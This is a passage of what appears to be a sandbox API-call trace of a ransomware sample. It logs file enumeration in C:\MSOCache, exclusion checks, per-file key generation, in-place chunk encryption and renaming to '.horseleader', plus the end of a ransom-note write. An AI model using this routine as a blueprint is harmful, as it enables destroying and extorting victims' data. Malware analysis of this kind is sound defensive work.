\r\ntell your unique ID\r\n") returned 1508 [0150.724] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0150.726] lstrlenA (lpString="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") returned 1368 [0150.726] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0150.726] CloseHandle (hObject=0x1cc) returned 1 [0150.727] GetProcessHeap () returned 0x780000 [0150.727] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a620 | out: hHeap=0x780000) returned 1 [0150.727] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="{90140000-001A-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9765F~1")) returned 1 [0150.727] lstrcmpiW (lpString1="{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0150.727] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C") returned 66 [0150.727] lstrcmpW (lpString1="{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0150.727] lstrcmpW (lpString1="{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0150.728] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", 
lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0150.728] GetProcessHeap () returned 0x780000 [0150.728] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79a620 [0150.728] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*") returned 68 [0150.728] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0150.737] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0150.737] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\.") returned 68 [0150.737] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0150.737] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0150.737] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0150.738] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0150.738] lstrlenW (lpString=".testttjffg") returned 11 [0150.738] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\.", lpSrch=".testttjffg") returned 0x0 [0150.738] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0150.738] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, 
pdwDataLen=0x32af044*=0x80) returned 1 [0150.738] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0150.739] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0150.739] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0150.739] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\..") returned 69 [0150.739] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0150.739] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0150.739] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0150.740] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0150.740] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0150.740] lstrlenW (lpString=".testttjffg") returned 11 [0150.740] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\..", lpSrch=".testttjffg") returned 0x0 [0150.740] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0150.740] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: 
pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0150.740] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0150.740] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3a6f2400, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3a6f2400, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xeebe0180, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xe21fcc, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="OutlkLR.cab", cAlternateFileName="")) returned 1 [0150.740] lstrcmpiW (lpString1="OutlkLR.cab", lpString2="Windows") returned -1 [0150.741] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 78 [0150.741] StrStrIW (lpFirst="OutlkLR.cab", lpSrch=".horseleader") returned 0x0 [0150.741] lstrcmpW (lpString1="OutlkLR.cab", lpString2="#Decrypt#.txt") returned 1 [0150.741] lstrcmpW (lpString1="OutlkLR.cab", lpString2="_uninstalling_.png") returned 1 [0150.741] lstrlenW (lpString=".testttjffg") returned 11 [0150.741] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".testttjffg") returned 0x0 [0150.741] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0150.741] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0150.741] CreateFileW 
(lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0150.742] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 78 [0150.742] StrStrW (lpFirst="OutlkLR.cab", lpSrch=".txt") returned 0x0 [0150.742] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=14819276) returned 1 [0150.742] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.742] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0150.747] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.747] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0150.747] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x70e7e6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.748] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0150.857] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) 
returned 1 [0150.857] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0152.914] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xe1cfcc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.914] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0153.541] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0153.541] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0153.541] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.542] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0153.542] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0153.543] CloseHandle (hObject=0x21c) returned 1 [0157.106] GetProcessHeap () returned 0x780000 [0157.106] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc020 [0157.107] wnsprintfW (in: pszDest=0x7dc020, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All 
Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.horseleader") returned 90 [0157.107] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab.horseleader")) returned 1 [0157.108] GetProcessHeap () returned 0x780000 [0157.108] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc020 | out: hHeap=0x780000) returned 1 [0157.109] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee827f20, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2bba00, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="OutlookMUI.msi", cAlternateFileName="OUTLOO~1.MSI")) returned 1 [0157.109] lstrcmpiW (lpString1="OutlookMUI.msi", lpString2="Windows") returned -1 [0157.109] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 81 [0157.109] StrStrIW (lpFirst="OutlookMUI.msi", lpSrch=".horseleader") returned 0x0 [0157.109] lstrcmpW (lpString1="OutlookMUI.msi", lpString2="#Decrypt#.txt") returned 1 [0157.109] lstrcmpW (lpString1="OutlookMUI.msi", lpString2="_uninstalling_.png") returned 1 [0157.109] lstrlenW (lpString=".testttjffg") returned 11 [0157.110] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi", lpSrch=".testttjffg") returned 0x0 
[0157.110] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0157.110] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0157.110] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0157.111] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 81 [0157.111] StrStrW (lpFirst="OutlookMUI.msi", lpSrch=".txt") returned 0x0 [0157.111] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=2865664) returned 1 [0157.111] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.112] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0157.116] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.117] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0157.117] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x15b500, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.118] ReadFile (in: hFile=0x21c, 
lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0157.120] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.121] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0157.121] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x2b6a00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.121] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0157.124] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.124] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0157.125] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.125] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0157.125] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) 
returned 1 [0157.125] CloseHandle (hObject=0x21c) returned 1 [0160.844] GetProcessHeap () returned 0x780000 [0160.844] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7b3178 [0160.844] wnsprintfW (in: pszDest=0x7b3178, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.horseleader") returned 93 [0160.844] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi.horseleader")) returned 1 [0161.472] GetProcessHeap () returned 0x780000 [0161.472] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7b3178 | out: hHeap=0x780000) returned 1 [0161.472] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee827f20, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xc72, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="OutlookMUI.xml", cAlternateFileName="OUTLOO~1.XML")) returned 1 [0161.472] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2="Windows") returned -1 [0161.472] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 81 [0161.472] StrStrIW (lpFirst="OutlookMUI.xml", lpSrch=".horseleader") returned 0x0 [0161.472] lstrcmpW (lpString1="OutlookMUI.xml", 
lpString2="#Decrypt#.txt") returned 1 [0161.472] lstrcmpW (lpString1="OutlookMUI.xml", lpString2="_uninstalling_.png") returned 1 [0161.472] lstrlenW (lpString=".testttjffg") returned 11 [0161.472] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".testttjffg") returned 0x0 [0161.472] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0161.473] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0161.473] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0161.473] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 81 [0161.473] StrStrW (lpFirst="OutlookMUI.xml", lpSrch=".txt") returned 0x0 [0161.473] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=3186) returned 1 [0161.474] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0xc72, lpOverlapped=0x0) returned 1 [0161.477] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffff38e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0161.477] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0xc72, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0xc72, lpOverlapped=0x0) returned 1 
[0161.477] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.478] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0161.478] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0161.478] CloseHandle (hObject=0x21c) returned 1 [0161.483] GetProcessHeap () returned 0x780000 [0161.483] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7b3178 [0161.484] wnsprintfW (in: pszDest=0x7b3178, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.horseleader") returned 93 [0161.484] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.horseleader")) returned 1 [0161.485] GetProcessHeap () returned 0x780000 [0161.485] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7b3178 | out: hHeap=0x780000) returned 1 [0161.485] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf00db300, 
ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x106f, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0161.485] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0161.485] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0161.485] StrStrIW (lpFirst="Setup.xml", lpSrch=".horseleader") returned 0x0 [0161.485] lstrcmpW (lpString1="Setup.xml", lpString2="#Decrypt#.txt") returned 1 [0161.485] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0161.485] lstrlenW (lpString=".testttjffg") returned 11 [0161.485] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All 